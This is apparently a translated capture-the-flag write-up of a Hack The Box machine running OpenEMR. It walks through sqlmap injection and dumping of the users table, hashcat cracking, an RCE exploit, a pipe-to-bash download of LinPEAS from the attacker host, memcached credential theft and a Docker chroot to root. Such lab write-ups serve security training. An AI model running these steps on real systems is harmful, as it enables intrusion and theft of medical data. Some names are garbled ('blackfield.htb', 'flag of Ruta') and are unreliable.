We take a detailed look at the process of exploiting vulnerabilities in the OpenEMR medical records management system. We demonstrate how the Hack The Box platform can be used to detect and exploit vulnerabilities that lead to remote code execution (RCE).
The article discusses the exploitation of vulnerabilities in the CMS OpenEMR using memcached and Docker services.
Connection to the laboratory is via VPN. It is not recommended to use work computers or devices with important data for connection, since when working with a private network there is a risk of interaction with experienced specialists in the field of information security.
The machine is assigned the IP address 10.10.10.188, which is added to the /etc/hosts file
10.10.10.188 blackfield.htb
First, a scan of open ports is performed using a script that accepts one argument — the host address to scan:
#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1
The server runs SSH and the Apache web server.
And authorization is possible on the site.
And after logging in with this data, we will only get some kind of picture.
Browsing the site further, we find a mention of HMS on the About page.
Let’s add this name to /etc/hosts and see what the server returns:
10.10.10.188 hms.htb
That’s even better. This is the OpenEMR CMS. This system is being checked for available exploits, given that the 2018 version is being used.
An exploit with RCE capability was detected (the latest available version was selected). The exploit code was copied to the current working directory.
In the code we see that you need to specify credentials.
And the exploit description contains a link to the PoC.
By studying the material at this link, we will learn about SQL injection.
Go to hms.htb/portal and try to register.
Next, the link is taken to the address hms.htb/portal/add_edit_event_user.php?eid=1, which results in an error.
The query was repeated through Burp Suite and saved to a file. To detect and exploit the SQL injection, sqlmap is used, which is fed the saved query file.
sqlmap -r r.req
There is an injection! We will get all the databases.
sqlmap -r r.req --dbs
Now let’s learn tables from openemr.
sqlmap -r r.req -D openemr --tables
The most interesting part has been highlighted in the image. Data is being acquired from this area for further analysis.
sqlmap -r r.req -D openemr -T users_secure --dump
A bcrypt hash is obtained. To determine the appropriate mode of operation in Hashcat, a command is used to find its identifier.
hashcat --example | grep -A2 -B2 '\$2a$'
The exploit code specifies the address and port for listening, the obtained credentials, and the address of the website page to perform the attack.
Let’s open the listener and execute the exploit.
Let’s see who the users are.
A full TTY shell is created, after which the switch to the ash user is performed, using a known password.
python3 -c 'import pty;pty.spawn("/bin/bash")'
And we get the first flag.
For reconnaissance on a remote host, we use the LinPEAS script.
curl 10.10.15.110/linpeas.sh | /bin/bash
A lot of useful information was found: the system is using Docker, and the second user belongs to the docker group (999). The memcached service is running on local port 11211. Memcached memory is organized in segments called slabs. Connecting to port 11211 to get a list of available slabs.
telnet localhost 11211 stats slabs
Slabs are divided into smaller segments called chunks. In this case, only one slab and its corresponding chunks are found. A query is executed to retrieve the data stored in that slab.
stats cachedump 1 0
Each line contains a key identifier, the size of the data under that key, and a timestamp. The focus is on retrieving data with keys matching user and passwd.
get user get passwd
And we get a second user (you can log in via SSH).
Since Docker was mentioned earlier, a check is performed for available Docker images on the system for further analysis.
docker images
One Ubuntu image detected. Mounting it for further exploration of the contents.
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
We take the flag of Ruta.
The article provides a detailed look at the process of exploiting vulnerabilities in the OpenEMR CMS using tools such as Burp Suite, sqlmap, and Hashcat. Special attention is paid to memcached analysis, Docker usage, and gaining privileged access via RCE. Based on the findings, a step-by-step approach to uncovering and exploiting system vulnerabilities is demonstrated, which is useful for information security professionals.